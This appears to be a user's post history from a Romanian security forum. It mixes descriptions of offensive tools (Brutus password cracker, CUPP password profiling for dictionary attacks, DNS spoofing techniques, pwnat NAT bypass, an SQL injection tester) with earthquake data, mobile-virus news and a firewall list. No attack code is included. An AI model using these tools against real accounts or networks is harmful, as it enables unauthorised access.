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Everything posted by begood

  1. Brutus The remote password cracker for Windows. HTTP, FTP, Telnet, SMB etc supported. MingSweeper Network Reconnaissance tool for Windows 2000 & windows XP. Performs ping sweeps, port scanning, OS detection etc. MPTraceroute A simple and fast GUI traceroute/'firewalking' program for Windows 2000 (MUST have SP2 or above - thanks for reminding me K) & Windows XP. Allows traceroutes using any IP protocol also allows port specifications with UDP, TCP and TCP ack. smbclient & nmblookup (win32 port) Two utilities from samba that are compiled under Windows. Provides extra functionality over the native Windows 'nbtstat' & 'net use.' HooBieNet - Tools
  2. People spend a lot of time preparing for effective dictionary attack. Common User Passwords Profiler (CUPP) is made to simplify this attack method that is often used as last resort in penetration testing and forensic crime investigations. A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password. Going through different combinations and algorithms, CUPP can predict specific target passwords by exploiting human vulnerabilities. In password creation, as in many aspects of life, everybody tends to the original solution, but thanks to human nature, we all tend to originality in the same way, leading to almost absolute predictability. Common User Passwords Profiler version 3 comes with some fixes and new options! CUPP v3 released!
  3. Tools - www.technicalinfo.net sunt destule tool-uri "online" folositoare.
  4. DNS Spoofing is the art of making a DNS entry to point to an another IP than it would be supposed to point to. To understand better, let's see an example. You're on your web browser and wish to see the news on www.cnn.com, without to think of it, you just enter this URL in your address bar and press enter. Now, what's happening behind the scenes ? Well... basically, your browser is going to send a request to a DNS Server to get the matching IP address for www.cnn.com, then the DNS server tells your browser the IP address of CNN, so your browser to connect to CNN's IP address and display the content of the main page. Hold on a minute... You get a message saying that CNN's web site has closed because they don't have anymore money to pay for their web site. You're so amazed, you call and tell that to your best friend on the phone, of course he's laughing at you, but to be sure, he goes to CNN web site to check by himself. You are surprised when he tells you he can see the news of the day as usual and you start to wonder what's going on. Are you sure you are talking to the good IP address ? Let's check. You ask your friend to fire up his favorite DNS resolving tool (or simply ping) and to give you the IP address he's getting for www.cnn.com. Once you got it, you put it in your browser URL bar : You feel ridiculous and frustrated when you see CNN's web page with its daily news. Well you've just been the witness of a DNS hijacking scenario. You're wondering what happened, did the DNS Server told you the wrong IP address ? Maybe... At least this is the most obvious answer coming to our mind. In fact there are two techniques for accomplishing this DNS hijacking. Let's see the first one, the "DNS ID Spoofing" technique. read it all here : http://www.securesphere.net/download/papers/dnsspoof.htm download : http://www.2shared.com/file/12446366/fcca9422/DNS_Spoofing_techniques.html
  5. Author: Gareth Halfacree Published: 5th April 2010 The programmer behind the Samy MySpace worm has turned his mind to a potentially more useful - although just as as controversial - endeavor, resulting in the creation of a tool to connect two devices on separate networks without any port forwarding. The pwnat utility is designed to create a tunnel between two computers on separate private networks over the Internet without the need to reconfigure the router for port forwarding - in other words, allowing end users to bypass restrictions that might be in place without needed administrative access to the router itself. Samy Kamkar, a programmer with something of a checkered past following his creation of a cross-site scripting worm attacking MySpace and subsequent arrest for the same, describes the utility as "a proxy server that works behind a NAT [router], even when the client is [also] behind a NAT, without any third party," and explains that pwnat means that "both sides are fully communicating over UDP, allowing protocols that run over TCP to tunnel through." The pwnat utility is based on the updtunnel tool created by Daniel Meekins, along with Kamkar's previous software chownat. While the tool certainly has legitimate uses, it's something that will give those who rely on NAT 'firewalls' for protection pause for thought - if a router configured to block all incoming traffic is transparent to the pwnat tool, how much other traffic could be transmitted without the owner's knowledge? Softpedia explains that the utility could be used to improve the speed of BitTorrent-style peer-to-peer systems without needing any knowledge of configuring their routers for port forwarding. For those curious as to how the utility works - or who are a trifle concerned about blindly trusting code from the creator of a worm - Kamkar has made his source code fully available. Can you see a wealth of possibilities for the pwnat tool, or does it seem a trifle worrying that it is so easy to bypass the protections NAT offers? Share your thoughts over in the forums. the tool : RST pwnat – NAT To NAT Client Communication Tool via bit-tech.net
  6. vedea-te-aş manuşi cârtiţă jegoasă !

  7. Parameters The tool expects an URL with parameters, like this: http://www.example.com/articles/article.php?id=123&topic=injection It will not work if URL does not contain parameters. For example tool will not be able to check following URL: http://www.example.com/articles/article.php How SQL Injection Test works Script does parse URL provided, and modifies parameters to simulate simple SQL injection (adds double and single quotes). If resulting page contains error message generated by database management system (like MySQL, MSSQL, etc.) then script is most likely vulnerable to SQL injection. In this case SQL Injection Test tool will produce a warning. :: SQL Injection Vulnerability Test :: Online Tools
  8. Recently a new mobile virus named "MMS Bomber" has run rampant in China, and millions of Chinese mobile phones were impacted, reported Beijing Business News. The National Computer Network Emergency Response Technical Team/Coordination Center of China has alerted mobile users that the targets of the virus are mobile devices with S60 3rd OS, mostly Nokia and Samsung smart-phones. The virus is disguised as an application; once installed, the virus will automatically connect to the internet and send MMS containing a malicious URL to random mobile phone numbers without the user's awareness, and result in financial losses to mobile users. The virus was first captured by the Mobile Security Center of NetQin Mobile, a mobile security service provider, in early February. The company's statistic shows that at least 100,000 mobile phones were infected up to now. It's notable that the virus has defence mechanisms. Once infected, the virus will disable the system management program on the mobile phone, and mobile users will not be able to uninstall the virus, says Dr. Zou Shihong, Chief Scientist of NetQin. NetQin has now launched a software application which can scan and remove the virus successfully. cellular-news.com
  9. in 2010 au fost 12 cutremure de peste 6 grade pe scara richter. (ian-apr adica in 3 luni) doar in chile si in haiti s-au soldat victime. in 2009 au fost 7 cutremure de peste 6 grade in primele 3-4 luni ale anului. (19 in tot anul, doar 2 au fost majore, cu victime) in 2008 au fost 6 cutremure de peste 6 grd in primele 3-4 luni (32 in tot anul, 1 major cu victime) nu e un pattern. in 2008 au fost multe cutremure de peste 6 grade, in 2009 a mai scazut numarul. anu asta e drept, sunt mai multe cutremure decat in anii precedenti, cel putin pana in prezent. ahahaha
  10. un singur eveniment mai deosebit si tu incepi sa crezi ? n-ai coloana
  11. la astia pe site a ramas 7.2, la fel si pe cnn. peste 150 de replici ale cutremurului am numarat MAP 2.6 2010/04/05 07:39:40 32.511 -115.674 5.7 BAJA CALIFORNIA, MEXICO MAP 2.5 2010/04/05 07:38:13 32.653 -115.757 2.9 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 07:37:17 32.614 -115.761 1.6 BAJA CALIFORNIA, MEXICO MAP 5.0 2010/04/05 07:29:13 17.926 -81.548 10.0 CAYMAN ISLANDS REGION MAP 2.7 2010/04/05 07:20:55 32.685 -115.876 4.4 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 07:19:30 32.597 -115.741 1.7 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 07:16:05 33.417 -116.968 1.6 SOUTHERN CALIFORNIA MAP 4.1 2010/04/05 07:15:13 32.846 -114.620 7.0 SOUTHERN CALIFORNIA MAP 2.5 2010/04/05 07:13:19 32.696 -115.869 1.3 SOUTHERN CALIFORNIA MAP 2.7 2010/04/05 07:09:25 32.403 -115.519 12.5 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 07:08:02 32.666 -115.784 0.0 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 07:06:20 32.664 -115.769 1.3 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 07:02:27 32.354 -115.575 4.1 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 07:00:08 33.066 -116.123 1.3 SOUTHERN CALIFORNIA MAP 3.2 2010/04/05 06:59:12 32.399 -115.576 15.4 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/05 06:58:25 32.675 -115.831 1.4 SOUTHERN CALIFORNIA MAP 3.3 2010/04/05 06:49:39 32.633 -116.441 8.3 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 06:49:07 32.706 -115.835 2.6 SOUTHERN CALIFORNIA MAP 2.7 2010/04/05 06:45:28 32.654 -115.775 0.0 SOUTHERN CALIFORNIA MAP 2.7 2010/04/05 06:40:34 32.618 -115.756 7.5 BAJA CALIFORNIA, MEXICO MAP 2.7 2010/04/05 06:37:13 32.663 -115.835 5.6 SOUTHERN CALIFORNIA MAP 3.2 2010/04/05 06:31:35 32.794 -116.253 17.7 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 06:28:36 32.616 -115.795 1.6 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 06:27:07 32.592 -115.732 15.0 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 06:25:25 32.709 -115.842 3.5 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 06:23:09 32.637 -115.814 6.7 BAJA CALIFORNIA, MEXICO MAP 4.2 2010/04/05 06:17:00 32.616 -115.792 11.1 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 06:09:59 32.516 -115.698 3.1 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 06:06:13 32.710 -115.877 0.0 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 06:03:18 32.711 -115.884 0.0 SOUTHERN CALIFORNIA MAP 2.5 2010/04/05 06:01:57 32.588 -115.748 1.1 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 05:59:19 32.444 -115.614 1.6 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 05:55:23 32.614 -115.754 2.6 BAJA CALIFORNIA, MEXICO MAP 2.7 2010/04/05 05:46:09 32.715 -115.806 2.0 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 05:44:57 32.682 -115.768 1.1 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 05:42:18 33.450 -116.477 11.5 SOUTHERN CALIFORNIA MAP 4.0 2010/04/05 05:41:37 32.602 -115.763 3.2 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 05:39:53 32.391 -115.574 2.8 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 05:39:04 32.607 -115.774 9.4 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 05:37:48 32.565 -115.898 4.2 BAJA CALIFORNIA, MEXICO MAP 2.5 2010/04/05 05:36:38 32.506 -115.669 5.8 BAJA CALIFORNIA, MEXICO MAP 2.5 2010/04/05 05:35:19 32.661 -115.767 1.1 SOUTHERN CALIFORNIA MAP 3.3 2010/04/05 05:30:46 32.472 -115.611 0.1 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 05:28:04 32.683 -115.863 0.0 SOUTHERN CALIFORNIA MAP 3.6 2010/04/05 05:16:41 32.471 -115.490 4.0 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 05:06:19 32.440 -115.606 5.2 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 05:05:41 32.438 -115.641 0.2 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 05:05:00 32.642 -115.773 0.0 SOUTHERN CALIFORNIA MAP 2.5 2010/04/05 04:57:49 33.319 -116.597 16.7 SOUTHERN CALIFORNIA MAP 2.5 2010/04/05 04:53:50 32.526 -115.704 0.2 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/05 04:50:03 32.454 -115.572 11.2 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 04:45:55 32.592 -115.791 0.0 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 04:36:51 32.992 -115.923 33.0 SOUTHERN CALIFORNIA MAP 3.2 2010/04/05 04:34:46 32.604 -115.772 0.3 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 04:31:55 32.603 -115.766 0.0 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 04:31:19 32.721 -115.848 0.8 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 04:24:06 32.618 -115.789 0.1 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/05 04:18:09 32.530 -115.663 2.4 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 04:14:22 32.359 -115.561 2.2 BAJA CALIFORNIA, MEXICO MAP 2.7 2010/04/05 04:13:03 32.639 -115.791 3.7 BAJA CALIFORNIA, MEXICO MAP 4.4 2010/04/05 04:10:13 32.363 -115.545 12.1 BAJA CALIFORNIA, MEXICO MAP 4.3 2010/04/05 04:09:40 32.418 -115.523 0.2 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 04:07:51 32.652 -116.245 2.9 SOUTHERN CALIFORNIA MAP 3.1 2010/04/05 04:02:33 32.492 -115.649 15.1 BAJA CALIFORNIA, MEXICO MAP 3.5 2010/04/05 03:59:25 32.440 -115.656 6.9 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/05 03:58:46 32.595 -115.808 0.0 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/05 03:56:39 33.177 -115.823 10.7 SOUTHERN CALIFORNIA MAP 2.7 2010/04/05 03:55:59 32.692 -115.844 0.4 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 03:53:11 32.665 -115.816 0.0 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 03:45:50 32.639 -115.765 0.5 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 03:44:40 33.068 -115.562 10.0 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 03:43:09 32.648 -115.800 1.9 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 03:41:32 18.657 -66.832 13.8 PUERTO RICO REGION MAP 3.2 2010/04/05 03:37:54 33.053 -115.580 7.5 SOUTHERN CALIFORNIA MAP 4.5 2010/04/05 03:32:13 -33.339 -71.068 58.6 REGION METROPOLITANA, CHILE MAP 3.6 2010/04/05 03:31:42 32.705 -115.852 0.0 SOUTHERN CALIFORNIA MAP 3.2 2010/04/05 03:27:55 32.544 -115.734 4.0 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/05 03:23:13 32.788 -115.673 13.1 SOUTHERN CALIFORNIA MAP 3.1 2010/04/05 03:20:23 32.685 -115.799 2.5 SOUTHERN CALIFORNIA MAP 5.0 2010/04/05 03:15:24 32.628 -115.806 0.1 BAJA CALIFORNIA, MEXICO MAP 4.1 2010/04/05 03:13:13 33.016 -115.511 13.7 SOUTHERN CALIFORNIA MAP 4.4 2010/04/05 03:11:01 32.083 -114.999 6.0 SONORA, MEXICO MAP 3.9 2010/04/05 03:09:53 32.528 -115.624 6.1 BAJA CALIFORNIA, MEXICO MAP 3.6 2010/04/05 03:09:51 33.022 -115.969 7.8 SOUTHERN CALIFORNIA MAP 2.9 2010/04/05 03:05:55 32.669 -115.805 0.0 SOUTHERN CALIFORNIA MAP 3.3 2010/04/05 03:04:50 32.582 -115.727 29.2 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 03:03:40 32.648 -115.805 0.1 SOUTHERN CALIFORNIA MAP 3.5 2010/04/05 03:02:35 32.643 -115.802 0.0 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 03:01:14 32.622 -115.733 2.8 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/05 02:59:11 32.816 -116.205 27.0 SOUTHERN CALIFORNIA MAP 4.2 2010/04/05 02:54:34 32.453 -115.619 14.5 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 02:51:30 32.629 -115.806 4.2 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 02:46:30 33.145 -115.872 26.8 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 02:43:34 32.628 -115.767 1.5 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/05 02:41:36 32.658 -116.161 0.7 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 02:40:09 32.536 -115.662 4.1 BAJA CALIFORNIA, MEXICO MAP 2.6 2010/04/05 02:36:52 33.241 -115.635 8.4 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 02:34:48 32.596 -115.764 0.8 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 02:33:20 32.560 -115.752 7.3 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/05 02:29:14 32.590 -115.758 0.0 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 02:24:57 33.469 -116.457 7.5 SOUTHERN CALIFORNIA MAP 2.5 2010/04/05 02:24:10 33.214 -116.129 12.5 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 02:10:19 33.181 -116.453 12.6 SOUTHERN CALIFORNIA MAP 3.2 2010/04/05 02:07:47 33.008 -116.126 7.2 SOUTHERN CALIFORNIA MAP 2.9 2010/04/05 02:05:28 32.548 -115.739 8.0 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 01:58:30 33.022 -116.455 4.4 SOUTHERN CALIFORNIA MAP 2.9 2010/04/05 01:54:06 33.781 -116.080 3.9 SOUTHERN CALIFORNIA MAP 4.4 2010/04/05 01:52:26 32.608 -115.766 12.6 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 01:50:02 32.651 -115.790 0.3 SOUTHERN CALIFORNIA MAP 2.6 2010/04/05 01:48:47 32.681 -115.830 2.1 SOUTHERN CALIFORNIA MAP 2.7 2010/04/05 01:46:21 32.678 -115.997 6.5 SOUTHERN CALIFORNIA MAP 2.9 2010/04/05 01:42:29 32.791 -116.252 7.0 SOUTHERN CALIFORNIA MAP 3.5 2010/04/05 01:39:49 32.611 -116.205 11.0 SOUTHERN CALIFORNIA MAP 3.5 2010/04/05 01:35:43 32.672 -115.812 1.5 SOUTHERN CALIFORNIA MAP 3.3 2010/04/05 01:31:32 32.584 -115.770 3.5 BAJA CALIFORNIA, MEXICO MAP 3.4 2010/04/05 01:28:14 32.642 -115.719 8.9 BAJA CALIFORNIA, MEXICO MAP 5.1 2010/04/05 01:25:35 32.167 -115.103 6.0 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 01:25:01 32.393 -115.578 13.9 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 01:22:54 33.480 -116.502 11.2 SOUTHERN CALIFORNIA MAP 4.0 2010/04/05 01:22:44 32.506 -115.662 6.8 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 01:21:39 32.796 -116.234 21.8 SOUTHERN CALIFORNIA MAP 3.1 2010/04/05 01:20:44 32.619 -116.409 16.6 SOUTHERN CALIFORNIA MAP 2.8 2010/04/05 01:16:55 32.595 -116.309 22.2 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 01:13:57 32.595 -115.785 0.0 BAJA CALIFORNIA, MEXICO MAP 2.7 2010/04/05 01:10:35 32.983 -115.705 27.2 SOUTHERN CALIFORNIA MAP 4.3 2010/04/05 01:06:39 32.202 -115.376 10.0 BAJA CALIFORNIA, MEXICO MAP 2.8 2010/04/05 01:05:27 32.664 -115.826 0.2 SOUTHERN CALIFORNIA MAP 4.2 2010/04/05 00:58:51 32.236 -115.326 10.0 BAJA CALIFORNIA, MEXICO MAP 3.2 2010/04/05 00:56:06 32.521 -115.684 15.9 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/05 00:53:31 32.648 -115.778 1.9 SOUTHERN CALIFORNIA MAP 3.6 2010/04/05 00:42:09 32.658 -115.810 2.3 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 00:40:51 32.686 -115.850 0.1 SOUTHERN CALIFORNIA MAP 3.6 2010/04/05 00:38:09 32.442 -115.626 6.6 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 00:37:48 19.249 -66.283 17.7 PUERTO RICO REGION MAP 3.2 2010/04/05 00:33:14 33.184 -116.411 11.7 SOUTHERN CALIFORNIA MAP 3.8 2010/04/05 00:32:10 32.608 -115.755 0.4 BAJA CALIFORNIA, MEXICO MAP 3.5 2010/04/05 00:31:15 32.311 -115.456 30.5 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/05 00:30:44 32.669 -116.097 8.0 SOUTHERN CALIFORNIA MAP 3.5 2010/04/05 00:30:01 32.572 -115.763 3.6 BAJA CALIFORNIA, MEXICO MAP 3.5 2010/04/05 00:27:04 33.031 -115.729 3.5 SOUTHERN CALIFORNIA MAP 3.4 2010/04/05 00:25:43 33.022 -116.022 6.8 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 00:25:23 33.175 -116.414 12.2 SOUTHERN CALIFORNIA MAP 4.1 2010/04/05 00:22:13 32.456 -115.530 27.6 BAJA CALIFORNIA, MEXICO MAP 3.7 2010/04/05 00:21:27 32.599 -115.742 3.9 BAJA CALIFORNIA, MEXICO MAP 3.8 2010/04/05 00:20:13 32.475 -115.643 0.1 BAJA CALIFORNIA, MEXICO MAP 3.1 2010/04/05 00:19:36 32.609 -115.748 6.0 BAJA CALIFORNIA, MEXICO MAP 4.3 2010/04/05 00:12:23 32.577 -115.744 0.0 BAJA CALIFORNIA, MEXICO MAP 5.1 2010/04/05 00:07:13 31.953 -114.793 14.0 SONORA, MEXICO MAP 3.7 2010/04/05 00:06:00 32.516 -115.713 1.5 BAJA CALIFORNIA, MEXICO MAP 3.4 2010/04/05 00:04:52 32.681 -115.841 10.3 SOUTHERN CALIFORNIA MAP 3.1 2010/04/05 00:02:48 33.186 -115.873 0.0 SOUTHERN CALIFORNIA MAP 3.0 2010/04/05 00:01:49 33.175 -116.406 12.9 SOUTHERN CALIFORNIA MAG UTC DATE-TIME y/m/d h:m:s LAT deg LON deg DEPTH km Region MAP 3.9 2010/04/04 23:57:13 32.586 -115.735 6.0 BAJA CALIFORNIA, MEXICO MAP 3.6 2010/04/04 23:53:44 32.548 -115.736 6.0 BAJA CALIFORNIA, MEXICO MAP 3.4 2010/04/04 23:50:08 32.649 -115.766 5.1 SOUTHERN CALIFORNIA MAP 3.4 2010/04/04 23:48:23 32.916 -115.401 21.5 SOUTHERN CALIFORNIA MAP 2.8 2010/04/04 23:48:13 62.108 -150.849 64.5 CENTRAL ALASKA MAP 3.3 2010/04/04 23:46:30 32.685 -115.796 5.4 SOUTHERN CALIFORNIA MAP 4.7 2010/04/04 23:37:33 32.424 -115.543 6.0 BAJA CALIFORNIA, MEXICO MAP 4.2 2010/04/04 23:34:28 32.576 -115.747 6.0 BAJA CALIFORNIA, MEXICO MAP 4.4 2010/04/04 23:33:14 32.422 -115.383 10.0 BAJA CALIFORNIA, MEXICO MAP 5.4 2010/04/04 23:25:09 32.122 -115.061 10.0 BAJA CALIFORNIA, MEXICO MAP 3.6 2010/04/04 23:22:04 33.144 -116.496 7.1 SOUTHERN CALIFORNIA MAP 3.9 2010/04/04 23:19:32 32.594 -115.748 10.0 BAJA CALIFORNIA, MEXICO MAP 2.9 2010/04/04 23:19:17 32.765 -116.049 0.0 SOUTHERN CALIFORNIA MAP 5.3 2010/04/04 23:15:10 32.040 -115.240 10.0 BAJA CALIFORNIA, MEXICO MAP 3.0 2010/04/04 23:10:14 33.965 -118.713 6.0 SANTA MONICA BAY, CALIFORNIA MAP 4.8 2010/04/04 23:09:39 32.109 -115.329 6.0 BAJA CALIFORNIA, MEXICO MAP 3.9 2010/04/04 22:56:40 33.157 -116.446 10.1 SOUTHERN CALIFORNIA MAP 3.4 2010/04/04 22:47:58 32.898 -116.259 15.0 SOUTHERN CALIFORNIA MAP 7.2 2010/04/04 22:40:41 32.128 -115.303 10.0 BAJA CALIFORNIA, MEXICO
  12. ultima data cand am verificat pirateria ajuta promovarea -> vanzarile cresc.
  13. Azi, la ora 0:40, ora Romaniei, s-a produs un cutremur de 7.2 grade pe scara Richter in BAJA CALIFORNIA, MEXICO. coordonate : 32.093°N, 115.249°W adancime : 32.3 km update : coordonate : 32.128°N, 115.303°W adancime 10 km Primul punct afectat se pare ca a fost in SAN FRANCISCO BAY AREA, CALIFORNIA, cutremur cu magnitudinea de 2.7 grd, la ora 22 ora Romaniei. Peste jumatate de ora in zona Fiji s-a declansat un nou cutremur cu magnitudinea de 5.1. Dupa inca 6 minute in BAJA CALIFORNIA, MEXICO, unul mic de 3.8 grade urmat de cel mai mare de 6.9 grade la o diferenta de 6 minute. Pana la ora scrierii acestui articol au mai fost inca 6 replici de pana in 5.1 grade. update : 15 replici cu maxim in 5.4 //scris de mine. gasit in urma trendului pe twitter : earthquake Latest Earthquakes in the World - Past 7 days http://trendistic.com/earthquake/_24-hours Twitter Magnitude 6.9 - BAJA CALIFORNIA, MEXICO IRIS Seismic Monitor MAP 3.4 2010/04/04 23:48:23 32.916 -115.401 21.5 SOUTHERN CALIFORNIA MAP 3.5 2010/04/04 23:46:29 32.667 -115.795 3.5 SOUTHERN CALIFORNIA MAP 4.7 2010/04/04 23:37:32 32.468 -115.565 0.8 BAJA CALIFORNIA, MEXICO MAP 4.3 2010/04/04 23:34:27 32.575 -115.717 20.1 BAJA CALIFORNIA, MEXICO MAP 5.4 2010/04/04 23:25:09 32.122 -115.061 10.0 BAJA CALIFORNIA, MEXICO MAP 3.6 2010/04/04 23:22:04 33.144 -116.496 7.0 SOUTHERN CALIFORNIA MAP 3.8 2010/04/04 23:19:20 32.751 -116.333 0.1 SOUTHERN CALIFORNIA MAP 5.1 2010/04/04 23:15:20 32.839 -115.585 16.9 SOUTHERN CALIFORNIA MAP 4.5 2010/04/04 23:09:49 32.440 -115.958 2.0 BAJA CALIFORNIA, MEXICO MAP 6.9 2010/04/04 22:40:39 32.093 -115.249 32.3 BAJA CALIFORNIA, MEXICO MAP 3.3 2010/04/04 22:34:48 32.184 -115.287 0.2 BAJA CALIFORNIA, MEXICO MAP 5.1 2010/04/04 20:28:05 -17.197 -176.994 23.0 FIJI REGION MAP 2.7 2010/04/04 19:54:41 37.383 -121.739 6.7 SAN FRANCISCO BAY AREA, CALIFORNIA update : vad ca au schimbat de la 6.9 grade la 7.2 grade update2: sunt replici de ~4 grade la adancimi de 0.1 - 0.8 km
  14. 1. ZoneAlarm® Free Firewall: “ZoneAlarm Free Firewall blocks hackers from infiltrating your home PC by hiding your computer from unsolicited network traffic. By detecting and preventing intrusions, ZoneAlarm Free Firewall keeps your PC free from viruses that slow down performance, and spyware that steals your personal information, passwords, and financial data. • Essential firewall protection • Be invisible to others online • New interface makes it even easier—smaller size keeps it light” Download ZoneAlarm® Free Firewall here. Ashampoo® FireWall FREE: Ashampoo Firewall Free “The brand-new Ashampoo FireWall FREE is different. It's Configuration Assistant guides you through every step of the simple setup process. And Easy Mode makes using it a breeze – you don’t need any special technical knowledge and everything is explained clearly. Ashampoo FireWall FREE is also amazingly compact. Even with its four additional security tools it’s a tiny program that uses very little memory and computer resources. You get the heavy-duty protection without heavyweight overload on your system. Ashampoo has years of experience in making programs simple to use. The Ashampoo FireWall FREE user interface explains itself, every step of the way. The information is right there on the screen where you need it, so that most users will never need to consult the help. But detailed help is also there when you need it.” This one has not been updated since 2007! Download Ashampoo® FireWall FREE here. 3. GhostWall FireWall: GhostWall FireWall “GhostWall is a highly effecient firewall designed to also show interesting statistics about the current state of your network. It comes configured to protect against inbound threats. Unlike all other firewalls, GhostWall doesn’t slow the network performance of online games like Counter-Strike, World of Warcraft and Everquest. GhostWall FireWall is a small piece of software program which runs under Windows operating system including Windows 2000, 2003, XP and Windows XP64. GhostWall is completely free for personal and corporate use.” This one is the LIGHTEST one ever! We were very happy with it’s performance. Call it a Windows based ACL! Download GhostWall FireWall here. 4. Agnitum Outpost Firewall Free: Agnitum Outpost Firewall Free “Outpost Firewall Free gives you solid firewall protection with standard packet and application filtering to safeguard your data against unauthorized third parties. Plus, you get advanced protection against illegal program activity that will help stymie unknown threats. All this coupled with minimum impact on your system resources makes Outpost Firewall Free a must-have instrument for an unprotected PC. It’s a free product – you essentially download it, install and use, free of charge, no time limitations. Second, it’s a better and more robust solution to Windows firewall – the latter lacks outbound filtering at default settings and is clumsy software compared to Outpost Firewall Free. Lastly, it has many advanced features that can surpass even commercial offerings, namely, proactive protection that defends against unknown malware by controlling installed applications’ activity; illegal termination prevention capabilities; usability aid tools that automatically assign correct policies for most widely-used applications; and a real-time network statistics monitor. Outpost Firewall Free is based on the award-winning technology utilized in more advanced Agnitum products and is a good starting point to explore the Internet is a safe manner.” A good firewall. We like this one too! Download Agnitum Outpost Firewall Free here. 5. Sunbelt Personal Firewall™: Sunbelt Personal Firewall “Protect yourself from hackers. Secure your PC with a 100% free firewall download. Get the full version free for 30 days. Sunbelt Personal Firewall (SPF) was called “our favorite” by PC Magazine. The Windows Firewall (both XP and Vista) is worse than useless, it gives you a false sense of security. Why? It only filters incoming traffic. That means if malware has compromised your PC, it is able to send out all your personal info. That’s right; the Windows “firewall” does not stop that! But SPF… • Supports WinXP and Vista (Win7 early 2010) • Filters both ingoing and outgoing traffic! • Keeps hackers out and your private info inside. • Works great with VIPRE Antivirus + Antispyware • Easy to use and does not slow down your PC! • 32-bit only (64-bit support coming soon) • Free & Full Version firewall software for different levels of protection ” Download Sunbelt Personal Firewall™ here. 6. Comodo Firewall: Comodo Firewall “Comodo Firewall Pro introduces the next evolution in computer security: Default Deny Protection (DDP™). What is DDP? Most security programs maintain a list of known malware, and use that list to decide which applications and files shouldn’t access a PC. The problem here is obvious. What if the list of malware is missing some entries, or isn’t up to date? DDP fixes this problem to ensure complete security. The firewall references a list of over two million known PC-friendly applications. If a file that is not on this safe-list knocks on your PC’s door, the Firewall immediately alerts you to the possibility of attacking malware. All this occurs before the malware infects your computer. It’s prevention-based security, the only way to keep PCs totally safe. Firewall is a component of Comodo Internet Security, which comes bundled with Comodo Antivirus. You have the option to only install Firewall if you prefer.” Download Comodo Firewall here. 7. PrivacyWare Privatefirewall: PrivacyWare “The web may be free, but we all know that to safely bank online, buy music, software, or books, or even simply surf the web, there is a price to pay. To combat online threats, firewall, anti-virus and anti-spyware software have become essential investments for any home or business computer. These programs monitor and control system access and scan and remove your system of malicious or spying software. But the range and sophistication of malicious software and hacking techniques is rapidly expanding and against which traditional software solutions do not provide a proactive defense. Now, Privacyware meets this need with Privatefirewall ? a proactive, multi-layered defense solution for Windows desktops and servers. What’s more – Privatefirewall is now absolutely FREE of charge.” Download Privatefirewall here. 8. Malware Guard System FirewallTM: Malware Guard “Helps to keep your computer more secure from 